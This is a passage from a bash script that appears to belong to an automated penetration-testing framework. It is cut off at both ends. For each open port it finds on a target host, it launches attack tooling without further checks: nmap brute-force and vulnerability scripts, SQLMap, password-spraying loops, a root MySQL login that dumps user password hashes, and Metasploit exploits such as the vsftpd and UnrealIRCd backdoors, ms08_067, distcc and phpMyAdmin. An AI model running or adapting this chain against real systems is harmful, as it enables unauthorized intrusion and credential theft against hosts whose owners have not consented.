"" +echo -e "$OKGREEN + -- ----------------------------=[Pinging host]=---------------------------- -- +$RESET" +ping -c 1 $TARGET +echo "" +echo -e "$OKGREEN + -- ----------------------------=[Running TCP port scan]=------------------- -- +$RESET" +if [ -z "$OPT1" ]; then + nmap -sS -T5 --open -p 21,22,23,25,53,79,80,110,111,135,139,162,389,443,445,512,513,514,1099,1524,2049,2121,3306,3310,3389,3632,5432,5800,5900,6667,8000,8009,8080,8180,8443,8888,10000,49152 $TARGET -oX $LOOT_DIR/nmap-$TARGET.xml + echo -e "$OKGREEN + -- ----------------------------=[Running UDP port scan]=------------------- -- +$RESET" + nmap -T5 --open -p U:53,U:67,U:68,U:88,U:161,U:162,U:137,U:138,U:139,U:389,U:520,U:2049 $TARGET +elif [ "$OPT1" == "web" ]; then + nmap -sV -T5 -p 80,443 --open $TARGET -oX $LOOT_DIR/nmap-$TARGET.xml +else + nmap -sS -T5 -p $OPT1 --open $TARGET -oX $LOOT_DIR/nmap-$TARGET.xml + echo -e "$OKGREEN + -- ----------------------------=[Running UDP port scan]=------------------- -- +$RESET" + nmap -sU -T5 -p U:$OPT1 --open $TARGET +fi + +service postgresql start + +echo "" +echo -e "$OKGREEN + -- ----------------------------=[Running Intrusive Scans]=----------------- -- +$RESET" +port_21=`grep 'portid="21"' $LOOT_DIR/nmap-$TARGET.xml | grep open` +port_22=`grep 'portid="22"' $LOOT_DIR/nmap-$TARGET.xml | grep open` +port_23=`grep 'portid="23"' $LOOT_DIR/nmap-$TARGET.xml | grep open` +port_25=`grep 'portid="25"' $LOOT_DIR/nmap-$TARGET.xml | grep open` +port_53=`grep 'portid="53"' $LOOT_DIR/nmap-$TARGET.xml | grep open` +port_79=`grep 'portid="79"' $LOOT_DIR/nmap-$TARGET.xml | grep open` +port_80=`grep 'portid="80"' $LOOT_DIR/nmap-$TARGET.xml | grep open` +port_110=`grep 'portid="110"' $LOOT_DIR/nmap-$TARGET.xml | grep open` +port_111=`grep 'portid="111"' $LOOT_DIR/nmap-$TARGET.xml | grep open` +port_135=`grep 'portid="135"' $LOOT_DIR/nmap-$TARGET.xml | grep open` +port_139=`grep 'portid="139"' $LOOT_DIR/nmap-$TARGET.xml | grep open` +port_162=`grep 'portid="162"' $LOOT_DIR/nmap-$TARGET.xml | grep open` +port_389=`grep 'portid="162"' $LOOT_DIR/nmap-$TARGET.xml | grep open` +port_443=`grep 'portid="443"' $LOOT_DIR/nmap-$TARGET.xml | grep open` +port_445=`grep 'portid="445"' $LOOT_DIR/nmap-$TARGET.xml | grep open` +port_512=`grep 'portid="512"' $LOOT_DIR/nmap-$TARGET.xml | grep open` +port_513=`grep 'portid="513"' $LOOT_DIR/nmap-$TARGET.xml | grep open` +port_514=`grep 'portid="514"' $LOOT_DIR/nmap-$TARGET.xml | grep open` +port_1099=`grep 'portid="1099"' $LOOT_DIR/nmap-$TARGET.xml | grep open` +port_1524=`grep 'portid="1524"' $LOOT_DIR/nmap-$TARGET.xml | grep open` +port_2049=`grep 'portid="2049"' $LOOT_DIR/nmap-$TARGET.xml | grep open` +port_2121=`grep 'portid="2121"' $LOOT_DIR/nmap-$TARGET.xml | grep open` +port_3128=`grep 'portid="3128"' $LOOT_DIR/nmap-$TARGET.xml | grep open` +port_3306=`grep 'portid="3306"' $LOOT_DIR/nmap-$TARGET.xml | grep open` +port_3310=`grep 'portid="3310"' $LOOT_DIR/nmap-$TARGET.xml | grep open` +port_3389=`grep 'portid="3389"' $LOOT_DIR/nmap-$TARGET.xml | grep open` +port_3632=`grep 'portid="3632"' $LOOT_DIR/nmap-$TARGET.xml | grep open` +port_5432=`grep 'portid="5432"' $LOOT_DIR/nmap-$TARGET.xml | grep open` +port_5800=`grep 'portid="5800"' $LOOT_DIR/nmap-$TARGET.xml | grep open` +port_5900=`grep 'portid="5900"' $LOOT_DIR/nmap-$TARGET.xml | grep open` +port_6667=`grep 'portid="6667"' $LOOT_DIR/nmap-$TARGET.xml | grep open` +port_8000=`grep 'portid="8000"' $LOOT_DIR/nmap-$TARGET.xml | grep open` +port_8009=`grep 'portid="8009"' $LOOT_DIR/nmap-$TARGET.xml | grep open` +port_8080=`grep 'portid="8080"' $LOOT_DIR/nmap-$TARGET.xml | grep open` +port_8180=`grep 'portid="8180"' $LOOT_DIR/nmap-$TARGET.xml | grep open` +port_8443=`grep 'portid="8443"' $LOOT_DIR/nmap-$TARGET.xml | grep open` +port_8888=`grep 'portid="8888"' $LOOT_DIR/nmap-$TARGET.xml | grep open` +port_10000=`grep 'portid="10000"' $LOOT_DIR/nmap-$TARGET.xml | grep open` +port_49152=`grep 'portid="49152"' $LOOT_DIR/nmap-$TARGET.xml | grep open` + +if [ -z "$port_21" ]; +then + echo -e "$OKRED + -- --=[Port 21 closed... skipping.$RESET" +else + echo -e "$OKORANGE + -- --=[Port 21 opened... running tests...$RESET" + nmap -sV -sC -T5 -p 21 --script=ftp-* $TARGET + msfconsole -x "use exploit/unix/ftp/vsftpd_234_backdoor; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; run; use unix/ftp/proftpd_133c_backdoor; run; exit;" +fi + +if [ -z "$port_22" ]; +then + echo -e "$OKRED + -- --=[Port 22 closed... skipping.$RESET" +else + echo -e "$OKORANGE + -- --=[Port 22 opened... running tests...$RESET" + nmap -sV -sC -T5 -p 22 --script=ssh-* $TARGET + msfconsole -x "use scanner/ssh/ssh_enumusers; setg USER_FILE "$PWD"/BruteX/wordlists/simple-users.txt; setg RHOSTS "$TARGET"; setg "$TARGET"; run; use scanner/ssh/ssh_identify_pubkeys; run; use scanner/ssh/ssh_version; run; exit;" +fi + +if [ -z "$port_23" ]; +then + echo -e "$OKRED + -- --=[Port 23 closed... skipping.$RESET" +else + echo -e "$OKORANGE + -- --=[Port 23 opened... running tests...$RESET" + echo "" + cisco-torch -A $TARGET + nmap -sV -T5 --script=telnet* -p 23 $TARGET + msfconsole -x "use scanner/telnet/lantronix_telnet_password; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; use scanner/telnet/lantronix_telnet_version; run; use scanner/telnet/telnet_encrypt_overflow; run; use scanner/telnet/telnet_ruggedcom; run; use scanner/telnet/telnet_version; run; exit;" +fi + +if [ -z "$port_25" ]; +then + echo -e "$OKRED + -- --=[Port 25 closed... skipping.$RESET" +else + echo -e "$OKORANGE + -- --=[Port 25 opened... running tests...$RESET" + nmap -sV -T5 --script=smtp* -p 25 $TARGET + smtp-user-enum -M VRFY -U $USER_FILE -t $TARGET + msfconsole -x "use scanner/smtp/smtp_enum; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; exit;" +fi + +if [ -z "$port_53" ]; +then + echo -e "$OKRED + -- --=[Port 53 closed... skipping.$RESET" +else + echo -e "$OKORANGE + -- --=[Port 53 opened... running tests...$RESET" + nmap -sV -T5 --script=dns* -p U:53,T:53 $TARGET +fi + +if [ -z "$port_79" ]; +then + echo -e "$OKRED + -- --=[Port 79 closed... skipping.$RESET" +else + echo -e "$OKORANGE + -- --=[Port 79 opened... running tests...$RESET" + nmap -sV -T5 --script=finger* -p 79 $TARGET + bin/fingertool.sh $TARGET BruteX/wordlists/simple-users.txt +fi + +if [ -z "$port_80" ]; +then + echo -e "$OKRED + -- --=[Port 80 closed... skipping.$RESET" +else + echo -e "$OKORANGE + -- --=[Port 80 opened... running tests...$RESET" + echo -e "$OKGREEN + -- ----------------------------=[Checking for WAF]=------------------------ -- +$RESET" + wafw00f http://$TARGET + echo "" + echo -e "$OKGREEN + -- ----------------------------=[Gathering HTTP Info]=--------------------- -- +$RESET" + whatweb http://$TARGET + xsstracer $TARGET 80 + echo "" + echo -e "$OKGREEN + -- ----------------------------=[Checking HTTP Headers]=------------------- -- +$RESET" + echo -e "$OKBLUE+ -- --=[Checking if X-Content options are enabled on $TARGET...$RESET $OKORANGE" + curl -s --insecure -I http://$TARGET | egrep -i 'X-Content' | tail -n 10 + echo "" + echo -e "$OKBLUE+ -- --=[Checking if X-Frame options are enabled on $TARGET...$RESET $OKORANGE" + curl -s --insecure -I http://$TARGET | egrep -i 'X-Frame' | tail -n 10 + echo "" + echo -e "$OKBLUE+ -- --=[Checking if X-XSS-Protection header is enabled on $TARGET...$RESET $OKORANGE" + curl -s --insecure -I http://$TARGET | egrep -i 'X-XSS' | tail -n 10 + echo "" + echo -e "$OKBLUE+ -- --=[Checking HTTP methods on $TARGET...$RESET $OKORANGE" + curl -s --insecure -I -X OPTIONS http://$TARGET | grep Allow | tail -n 10 + echo "" + echo -e "$OKBLUE+ -- --=[Checking if TRACE method is enabled on $TARGET...$RESET $OKORANGE" + curl -s --insecure -I -X TRACE http://$TARGET | grep TRACE | tail -n 10 + echo "" + echo -e "$OKBLUE+ -- --=[Checking for open proxy on $TARGET...$RESET $OKORANGE" + curl -s --insecure -x http://$TARGET:80 -L http://crowdshield.com/.testing/openproxy.txt | tail -n 10 + echo "" + echo -e "$OKBLUE+ -- --=[Enumerating software on $TARGET...$RESET $OKORANGE" + curl -s --insecure -I http://$TARGET | egrep -i "Server:|X-Powered|ASP|JSP|PHP|.NET" | tail -n 10 + echo "" + echo -e "$OKBLUE+ -- --=[Checking if Strict-Transport-Security is enabled on $TARGET...$RESET $OKORANGE" + curl -s --insecure -I http://$TARGET/ | egrep -i "Strict-Transport-Security" | tail -n 10 + echo "" + echo -e "$OKBLUE+ -- --=[Checking for Flash cross-domain policy on $TARGET...$RESET $OKORANGE" + curl -s --insecure http://$TARGET/crossdomain.xml | tail -n 10 + echo "" + echo -e "$OKBLUE+ -- --=[Checking for Silverlight cross-domain policy on $TARGET...$RESET $OKORANGE" + curl -s --insecure http://$TARGET/clientaccesspolicy.xml | tail -n 10 + echo "" + echo -e "$OKBLUE+ -- --=[Checking for HTML5 cross-origin resource sharing on $TARGET...$RESET $OKORANGE" + curl -s --insecure -I http://$TARGET | egrep -i "Access-Control-Allow-Origin" | tail -n 10 + echo "" + echo -e "$OKBLUE+ -- --=[Retrieving robots.txt on $TARGET...$RESET $OKORANGE" + curl -s --insecure http://$TARGET/robots.txt | tail -n 10 + echo "" + echo -e "$OKBLUE+ -- --=[Retrieving sitemap.xml on $TARGET...$RESET $OKORANGE" + curl -s --insecure http://$TARGET/sitemap.xml | tail -n 10 + echo "" + echo -e "$OKBLUE+ -- --=[Checking cookie attributes on $TARGET...$RESET $OKORANGE" + curl -s --insecure -I http://$TARGET | egrep -i "Cookie:" | tail -n 10 + echo "" + echo -e "$OKBLUE+ -- --=[Checking for ASP.NET Detailed Errors on $TARGET...$RESET $OKORANGE" + curl -s --insecure http://$TARGET/%3f.jsp | egrep -i 'Error|Exception' | tail -n 10 + curl -s --insecure http://$TARGET/test.aspx -L | egrep -i 'Error|Exception|System.Web.' | tail -n 10 + echo "" + echo -e "$RESET" + echo -e "$OKGREEN + -- ----------------------------=[Running Web Vulnerability Scan]=---------- -- +$RESET" + nikto -h http://$TARGET + echo -e "$OKGREEN + -- ----------------------------=[Saving Web Screenshots]=------------------ -- +$RESET" + echo -e "$OKRED[+]$RESET Screenshot saved to $PWD/loot/$TARGET-port80.jpg" + cutycapt --url=http://$TARGET --out=loot/$TARGET-port80.jpg + + if [ "$MODE" = "web" ]; + then + echo -e "$OKGREEN + -- ----------------------------=[Saving Web Screenshots]=------------------ -- +$RESET" + echo -e "$OKGREEN + -- ----------------------------=[Running NMap HTTP Scripts]=--------------- -- +$RESET" + nmap -sV -T5 -p 80 --script=http-enum,http-headers,http-server-header,http-php-version,http-iis-webdav-vuln,http-vuln-*,http-phpmyadmin-dir-traversal + echo -e "$OKGREEN + -- ----------------------------=[Running Directory Brute Force]=----------- -- +$RESET" + dirb http://$TARGET + echo -e "$OKGREEN + -- ----------------------------=[Running Wordpress Vulnerability Scans]=--- -- +$RESET" + wpscan --url http://$TARGET --batch + echo "" + wpscan --url http://$TARGET/wordpress/ --batch + echo "" + echo -e "$OKGREEN + -- ----------------------------=[Running CMSMap]=-------------------------- -- +$RESET" + python $CMSMAP -t http://$TARGET + echo "" + python $CMSMAP -t http://$TARGET/wordpress/ + echo "" + echo -e "$OKGREEN + -- ----------------------------=[Running Uniscan Web Vulnerability Scan]=-- -- +$RESET" + uniscan -u http://$TARGET -qweds + echo -e "$OKGREEN + -- ----------------------------=[Running SQLMap SQL Injection Scan]=------- -- +$RESET" + sqlmap -u "http://$TARGET" --batch --crawl=5 --level 1 --risk 1 -f -a + echo -e "$OKGREEN + -- ----------------------------=[Running PHPMyAdmin Metasploit Exploit]=--- -- +$RESET" + msfconsole -x "use exploit/multi/http/phpmyadmin_3522_backdoor; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; use exploit/unix/webapp/phpmyadmin_config; run; use multi/http/phpmyadmin_preg_replace; run; exit;" + echo -e "$OKGREEN + -- ----------------------------=[Running ShellShock Auto-Scan Exploit]=---- -- +$RESET" + python shocker/shocker.py -H $TARGET --cgilist shocker/shocker-cgi_list --port 80 + fi + + if [ $SCAN_TYPE == "DOMAIN" ]; + then + echo -e "$OKGREEN + -- ----------------------------=[Running Google Hacking Queries]=--------- -- +$RESET" + goohak $TARGET > /dev/null + echo -e "$OKGREEN + -- ----------------------------=[Running InUrlBR OSINT Queries]=---------- -- +$RESET" + php $INURLBR --dork "site:$TARGET" -s $LOOT_DIR/inurlbr-$TARGET.txt + rm -Rf output/ cookie.txt exploits.conf + GHDB="1" + fi +fi + +if [ -z "$port_110" ]; +then + echo -e "$OKRED + -- --=[Port 110 closed... skipping.$RESET" +else + echo -e "$OKORANGE + -- --=[Port 110 opened... running tests...$RESET" + nmap -sV -T5 --script=pop* -p 110 $TARGET +fi + +if [ -z "$port_111" ]; +then + echo -e "$OKRED + -- --=[Port 111 closed... skipping.$RESET" +else + echo -e "$OKORANGE + -- --=[Port 111 opened... running tests...$RESET" + showmount -a $TARGET + showmount -d $TARGET + showmount -e $TARGET +fi + +if [ -z "$port_135" ]; +then + echo -e "$OKRED + -- --=[Port 135 closed... skipping.$RESET" +else + echo -e "$OKORANGE + -- --=[Port 135 opened... running tests...$RESET" + rpcinfo -p $TARGET + nmap -p 135 -T5 --script=rpc* $TARGET +fi + +if [ -z "$port_139" ]; +then + echo -e "$OKRED + -- --=[Port 139 closed... skipping.$RESET" +else + echo -e "$OKORANGE + -- --=[Port 139 opened... running tests...$RESET" + SMB="1" + echo -e "$OKGREEN + -- ----------------------------=[Running SMB Enumeration]=----------------- -- +$RESET" + enum4linux $TARGET + python $SAMRDUMP $TARGET + nbtscan $TARGET + nmap -sV -T5 -p139 --script=smb-server-stats --script=smb-ls --script=smb-enum-domains --script=smbv2-enabled --script=smb-psexec --script=smb-enum-groups --script=smb-enum-processes --script=smb-brute --script=smb-print-text --script=smb-security-mode --script=smb-os-discovery --script=smb-enum-sessions --script=smb-mbenum --script=smb-enum-users --script=smb-enum-shares --script=smb-system-info --script=smb-vuln-ms10-054 --script=smb-vuln-ms10-061 $TARGET + msfconsole -x "use auxiliary/scanner/smb/pipe_auditor; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; use auxiliary/scanner/smb/pipe_dcerpc_auditor; run; use auxiliary/scanner/smb/psexec_loggedin_users; run; use auxiliary/scanner/smb/smb2; run; use auxiliary/scanner/smb/smb_enum_gpp; run; use auxiliary/scanner/smb/smb_enumshares; run; use auxiliary/scanner/smb/smb_enumusers; run; use auxiliary/scanner/smb/smb_enumusers_domain; run; use auxiliary/scanner/smb/smb_login; run; use auxiliary/scanner/smb/smb_lookupsid; run; use auxiliary/scanner/smb/smb_uninit_cred; run; use auxiliary/scanner/smb/smb_version; run; use exploit/linux/samba/chain_reply; run; use windows/smb/ms08_067_netapi; run; exit;" +fi + +if [ -z "$port_162" ]; +then + echo -e "$OKRED + -- --=[Port 162 closed... skipping.$RESET" +else + echo -e "$OKORANGE + -- --=[Port 162 opened... running tests...$RESET" + for a in `cat BruteX/wordlists/snmp-community-strings.txt`; do snmpwalk $TARGET -c $a; done; + nmap -p 162 --script=snmp* $TARGET +fi + +if [ -z "$port_389" ]; +then + echo -e "$OKRED + -- --=[Port 389 closed... skipping.$RESET" +else + echo -e "$OKORANGE + -- --=[Port 389 opened... running tests...$RESET" + nmap -p 389 -T5 --script=ldap* $TARGET +fi + +if [ -z "$port_443" ]; +then + echo -e "$OKRED + -- --=[Port 443 closed... skipping.$RESET" +else + echo -e "$OKORANGE + -- --=[Port 443 opened... running tests...$RESET" + echo -e "$OKGREEN + -- ----------------------------=[Checking for WAF]=------------------------ -- +$RESET" + wafw00f https://$TARGET + echo "" + echo -e "$OKGREEN + -- ----------------------------=[Gathering HTTP Info]=--------------------- -- +$RESET" + whatweb https://$TARGET + echo "" + echo -e "$OKGREEN + -- ----------------------------=[Gathering SSL/TLS Info]=------------------ -- +$RESET" + sslyze --resum --certinfo=basic --compression --reneg --sslv2 --sslv3 --hide_rejected_ciphers $TARGET + sslscan --no-failed $TARGET + testssl $TARGET + echo "" + cd MassBleed + ./massbleed $TARGET port 443 + cd .. + echo -e "$OKGREEN + -- ----------------------------=[Checking HTTP Headers]=------------------- -- +$RESET" + echo -e "$OKBLUE+ -- --=[Checking if X-Content options are enabled on $TARGET...$RESET $OKORANGE" + curl -s --insecure -I https://$TARGET | egrep -i 'X-Content' | tail -n 10 + echo "" + echo -e "$OKBLUE+ -- --=[Checking if X-Frame options are enabled on $TARGET...$RESET $OKORANGE" + curl -s --insecure -I https://$TARGET | egrep -i 'X-Frame' | tail -n 10 + echo "" + echo -e "$OKBLUE+ -- --=[Checking if X-XSS-Protection header is enabled on $TARGET...$RESET $OKORANGE" + curl -s --insecure -I https://$TARGET | egrep -i 'X-XSS' | tail -n 10 + echo "" + echo -e "$OKBLUE+ -- --=[Checking HTTP methods on $TARGET...$RESET $OKORANGE" + curl -s --insecure -I -X OPTIONS https://$TARGET | grep Allow + echo "" + echo -e "$OKBLUE+ -- --=[Checking if TRACE method is enabled on $TARGET...$RESET $OKORANGE" + curl -s --insecure -I -X TRACE https://$TARGET | grep TRACE + echo "" + echo -e "$OKBLUE+ -- --=[Checking for open proxy on $TARGET...$RESET $OKORANGE" + curl -x https://$TARGET:443 -L https://crowdshield.com/.testing/openproxy.txt -s --insecure | tail -n 10 + echo "" + echo -e "$OKBLUE+ -- --=[Enumerating software on $TARGET...$RESET $OKORANGE" + curl -s --insecure -I https://$TARGET | egrep -i "Server:|X-Powered|ASP|JSP|PHP|.NET" | tail -n 10 + echo "" + echo -e "$OKBLUE+ -- --=[Checking if Strict-Transport-Security is enabled on $TARGET...$RESET $OKORANGE" + curl -s --insecure -I https://$TARGET/ | egrep -i "Strict-Transport-Security" | tail -n 10 + echo "" + echo -e "$OKBLUE+ -- --=[Checking for Flash cross-domain policy on $TARGET...$RESET $OKORANGE" + curl -s --insecure https://$TARGET/crossdomain.xml | tail -n 10 + echo "" + echo -e "$OKBLUE+ -- --=[Checking for Silverlight cross-domain policy on $TARGET...$RESET $OKORANGE" + curl -s --insecure https://$TARGET/clientaccesspolicy.xml | tail -n 10 + echo "" + echo -e "$OKBLUE+ -- --=[Checking for HTML5 cross-origin resource sharing on $TARGET...$RESET $OKORANGE" + curl -s --insecure -I https://$TARGET | egrep -i "Access-Control-Allow-Origin" | tail -n 10 + echo "" + echo -e "$OKBLUE+ -- --=[Retrieving robots.txt on $TARGET...$RESET $OKORANGE" + curl -s --insecure https://$TARGET/robots.txt | tail -n 10 + echo "" + echo -e "$OKBLUE+ -- --=[Retrieving sitemap.xml on $TARGET...$RESET $OKORANGE" + curl -s --insecure https://$TARGET/sitemap.xml | tail -n 10 + echo "" + echo -e "$OKBLUE+ -- --=[Checking cookie attributes on $TARGET...$RESET $OKORANGE" + curl -s --insecure -I https://$TARGET | egrep -i "Cookie:" | tail -n 10 + echo "" + echo -e "$OKBLUE+ -- --=[Checking for ASP.NET Detailed Errors on $TARGET...$RESET $OKORANGE" + curl -s --insecure https://$TARGET/%3f.jsp | egrep -i 'Error|Exception' | tail -n 10 + curl -s --insecure https://$TARGET/test.aspx -L | egrep -i 'Error|Exception|System.Web.' | tail -n 10 + echo "" + echo -e "$RESET" + echo -e "$OKGREEN + -- ----------------------------=[Running Web Vulnerability Scan]=---------- -- +$RESET" + nikto -h https://$TARGET + echo -e "$OKGREEN + -- ----------------------------=[Saving Web Screenshots]=------------------ -- +$RESET" + cutycapt --url=https://$TARGET --out=loot/$TARGET-port443.jpg + echo -e "$OKRED[+]$RESET Screenshot saved to $PWD/loot/$TARGET-port443.jpg" + + if [ "$MODE" = "web" ]; + then + echo -e "$OKGREEN + -- ----------------------------=[Running NMap HTTP Scripts]=--------------- -- +$RESET" + nmap -sV -T5 -p 443 --script=http-enum,http-headers,http-server-header,http-php-version,http-iis-webdav-vuln,http-vuln-*,http-phpmyadmin-dir-traversal + echo -e "$OKGREEN + -- ----------------------------=[Running Directory Brute Force]=----------- -- +$RESET" + dirb https://$TARGET + echo -e "$OKGREEN + -- ----------------------------=[Running Wordpress Vulnerability Scans]=--- -- +$RESET" + wpscan --url https://$TARGET --batch + echo "" + wpscan --url https://$TARGET/wordpress/ --batch + echo -e "$OKGREEN + -- ----------------------------=[Running CMSMap]=-------------------------- -- +$RESET" + python $CMSMAP -t https://$TARGET + echo "" + python $CMSMAP -t https://$TARGET/wordpress/ + echo "" + echo -e "$OKGREEN + -- ----------------------------=[Running Uniscan Web Vulnerability Scan]=-- -- +$RESET" + uniscan -u https://$TARGET -qweds + echo -e "$OKGREEN + -- ----------------------------=[Running SQLMap SQL Injection Scan]=------- -- +$RESET" + sqlmap -u "https://$TARGET" --batch --crawl=5 --level 1 --risk 1 -f -a + echo -e "$OKGREEN + -- ----------------------------=[Running PHPMyAdmin Metasploit Exploit]=--- -- +$RESET" + msfconsole -x "use exploit/multi/http/phpmyadmin_3522_backdoor; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; setg RPORT 443; run; use exploit/unix/webapp/phpmyadmin_config; run; use multi/http/phpmyadmin_preg_replace; run; exit;" + echo -e "$OKGREEN + -- ----------------------------=[Running ShellShock Auto-Scan Exploit]=---- -- +$RESET" + python shocker/shocker.py -H $TARGET --cgilist shocker/shocker-cgi_list --port 443 --ssl + fi + + if [ $SCAN_TYPE == "DOMAIN" ]; + then + if [ -z $GHDB ]; + then + echo -e "$OKGREEN + -- ----------------------------=[Running Google Hacking Queries]=---------- -- +$RESET" + goohak $TARGET > /dev/null + echo -e "$OKGREEN + -- ----------------------------=[Running InUrlBR OSINT Queries]=----------- -- +$RESET" + php $INURLBR --dork "site:$TARGET" -s $LOOT_DIR/inurlbr-$TARGET.txt + rm -Rf output/ cookie.txt exploits.conf + fi + fi +fi + +if [ -z "$port_445" ]; +then + echo -e "$OKRED + -- --=[Port 445 closed... skipping.$RESET" +elif [ $SMB = "1" ]; +then + echo -e "$OKRED + -- --=[Port 445 scanned... skipping.$RESET" +else + echo -e "$OKORANGE + -- --=[Port 445 opened... running tests...$RESET" + enum4linux $TARGET + python $SAMRDUMP $TARGET + nbtscan $TARGET + nmap -sV -T5 -p445 --script=smb-server-stats --script=smb-ls --script=smb-enum-domains --script=smbv2-enabled --script=smb-psexec --script=smb-enum-groups --script=smb-enum-processes --script=smb-brute --script=smb-print-text --script=smb-security-mode --script=smb-os-discovery --script=smb-enum-sessions --script=smb-mbenum --script=smb-enum-users --script=smb-enum-shares --script=smb-system-info --script=smb-vuln-ms10-054 --script=smb-vuln-ms10-061 $TARGET + msfconsole -x "use auxiliary/scanner/smb/pipe_auditor; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; use auxiliary/scanner/smb/pipe_dcerpc_auditor; run; use auxiliary/scanner/smb/psexec_loggedin_users; run; use auxiliary/scanner/smb/smb2; run; use auxiliary/scanner/smb/smb_enum_gpp; run; use auxiliary/scanner/smb/smb_enumshares; run; use auxiliary/scanner/smb/smb_enumusers; run; use auxiliary/scanner/smb/smb_enumusers_domain; run; use auxiliary/scanner/smb/smb_login; run; use auxiliary/scanner/smb/smb_lookupsid; run; use auxiliary/scanner/smb/smb_uninit_cred; run; use auxiliary/scanner/smb/smb_version; run; use exploit/linux/samba/chain_reply; run; use windows/smb/ms08_067_netapi; run; exit;" +fi + +if [ -z "$port_512" ]; +then + echo -e "$OKRED + -- --=[Port 512 closed... skipping.$RESET" +else + echo -e "$OKORANGE + -- --=[Port 512 opened... running tests...$RESET" + nmap -sV -T5 -p 512 --script=rexec* $TARGET +fi + +if [ -z "$port_513" ] +then + echo -e "$OKRED + -- --=[Port 513 closed... skipping.$RESET" +else + echo -e "$OKORANGE + -- --=[Port 513 opened... running tests...$RESET" + nmap -sV -T5 -p 513 --script=rlogin* $TARGET +fi + +if [ -z "$port_514" ]; +then + echo -e "$OKRED + -- --=[Port 514 closed... skipping.$RESET" +else + echo -e "$OKORANGE + -- --=[Port 514 opened... running tests...$RESET" + amap $TARGET 514 -A +fi + +if [ -z "$port_2049" ]; +then + echo -e "$OKRED + -- --=[Port 2049 closed... skipping.$RESET" +else + echo -e "$OKORANGE + -- --=[Port 2049 opened... running tests...$RESET" + nmap -sV -T5 --script=nfs* -p 2049 $TARGET + rpcinfo -p $TARGET + showmount -e $TARGET + smbclient -L $TARGET -U " "%" " +fi + +if [ -z "$port_2121" ]; +then + echo -e "$OKRED + -- --=[Port 2121 closed... skipping.$RESET" +else + echo -e "$OKORANGE + -- --=[Port 2121 opened... running tests...$RESET" + nmap -sV -T5 --script=ftp* -p 2121 $TARGET + msfconsole -x "setg PORT 2121; use exploit/unix/ftp/vsftpd_234_backdoor; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; use unix/ftp/proftpd_133c_backdoor; run; exit;" +fi + +if [ -z "$port_3306" ]; +then + echo -e "$OKRED + -- --=[Port 3306 closed... skipping.$RESET" +else + echo -e "$OKORANGE + -- --=[Port 3306 opened... running tests...$RESET" + nmap -sV --script=mysql* -p 3306 $TARGET + mysql -u root -h $TARGET -e 'SHOW DATABASES; SELECT Host,User,Password FROM mysql.user;' +fi + +if [ -z "$port_3310" ]; +then + echo -e "$OKRED + -- --=[Port 3310 closed... skipping.$RESET" +else + echo -e "$OKORANGE + -- --=[Port 3310 opened... running tests...$RESET" + nmap -p 3310 -T5 -sV --script clamav-exec $TARGET +fi + +if [ -z "$port_3128" ]; +then + echo -e "$OKRED + -- --=[Port 3128 closed... skipping.$RESET" +else + echo -e "$OKORANGE + -- --=[Port 3128 opened... running tests...$RESET" + nmap -p 3128 -T5 -sV --script=*proxy* $TARGET +fi + +if [ -z "$port_3389" ]; +then + echo -e "$OKRED + -- --=[Port 3389 closed... skipping.$RESET" +else + echo -e "$OKORANGE + -- --=[Port 3389 opened... running tests...$RESET" + nmap -sV -T5 --script=rdp-* -p 3389 $TARGET + rdesktop $TARGET & +fi + +if [ -z "$port_3632" ]; +then + echo -e "$OKRED + -- --=[Port 3632 closed... skipping.$RESET" +else + echo -e "$OKORANGE + -- --=[Port 3632 opened... running tests...$RESET" + nmap -sV -T5 --script=distcc-* -p 3632 $TARGET + msfconsole -x "setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; use unix/misc/distcc_exec; run; exit;" +fi + +if [ -z "$port_5432" ]; +then + echo -e "$OKRED + -- --=[Port 5432 closed... skipping.$RESET" +else + echo -e "$OKORANGE + -- --=[Port 5432 opened... running tests...$RESET" + nmap -sV --script=pgsql-brute -p 5432 $TARGET +fi + +if [ -z "$port_5800" ]; +then + echo -e "$OKRED + -- --=[Port 5800 closed... skipping.$RESET" +else + echo -e "$OKORANGE + -- --=[Port 5800 opened... running tests...$RESET" + nmap -sV -T5 --script=vnc* -p 5800 $TARGET +fi + +if [ -z "$port_5900" ]; +then + echo -e "$OKRED + -- --=[Port 5900 closed... skipping.$RESET" +else + echo -e "$OKORANGE + -- --=[Port 5900 opened... running tests...$RESET" + nmap -sV -T5 --script=vnc* -p 5900 $TARGET +fi + +if [ -z "$port_6000" ]; +then + echo -e "$OKRED + -- --=[Port 6000 closed... skipping.$RESET" +else + echo -e "$OKORANGE + -- --=[Port 6000 opened... running tests...$RESET" + nmap -sV -T5 --script=x11* -p 6000 $TARGET +fi + +if [ -z "$port_6667" ]; +then + echo -e "$OKRED + -- --=[Port 6667 closed... skipping.$RESET" +else + echo -e "$OKORANGE + -- --=[Port 6667 opened... running tests...$RESET" + nmap -sV -T5 --script=irc* -p 6667 $TARGET + msfconsole -x "use unix/irc/unreal_ircd_3281_backdoor; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; run; exit;" +fi + +if [ -z "$port_8000" ]; +then + echo -e "$OKRED + -- --=[Port 8000 closed... skipping.$RESET" +else + echo -e "$OKORANGE + -- --=[Port 8000 opened... running tests...$RESET" + wafw00f http://$TARGET:8000 + echo "" + whatweb http://$TARGET:8000 + echo "" + xsstracer $TARGET 8000 + cd .. + nikto -h http://$TARGET:8000 + cutycapt --url=http://$TARGET:8000 --out=loot/$TARGET-port8000.jpg + python jexboss/jexboss.py -host http://$TARGET:8000 + +fi + +if [ -z "$port_8100" ]; +then + echo -e "$OKRED + -- --=[Port 8100 closed... skipping.$RESET" +else + echo -e "$OKORANGE + -- --=[Port 8100 opened... running tests...$RESET" + wafw00f http://$TARGET:8100 + echo "" + whatweb http://$TARGET:8100 + echo "" + xsstracer $TARGET 8100 + sslscan --no-failed $TARGET:8100 + cd MassBleed + ./massbleed $TARGET port 8100 + cd .. + nikto -h http://$TARGET:8100 + cutycapt --url=http://$TARGET:8100 --out=loot/$TARGET-port8100.jpg + python jexboss/jexboss.py -host http://$TARGET:8100 +fi + +if [ -z "$port_8080" ]; +then + echo -e "$OKRED + -- --=[Port 8080 closed... skipping.$RESET" +else + echo -e "$OKORANGE + -- --=[Port 8080 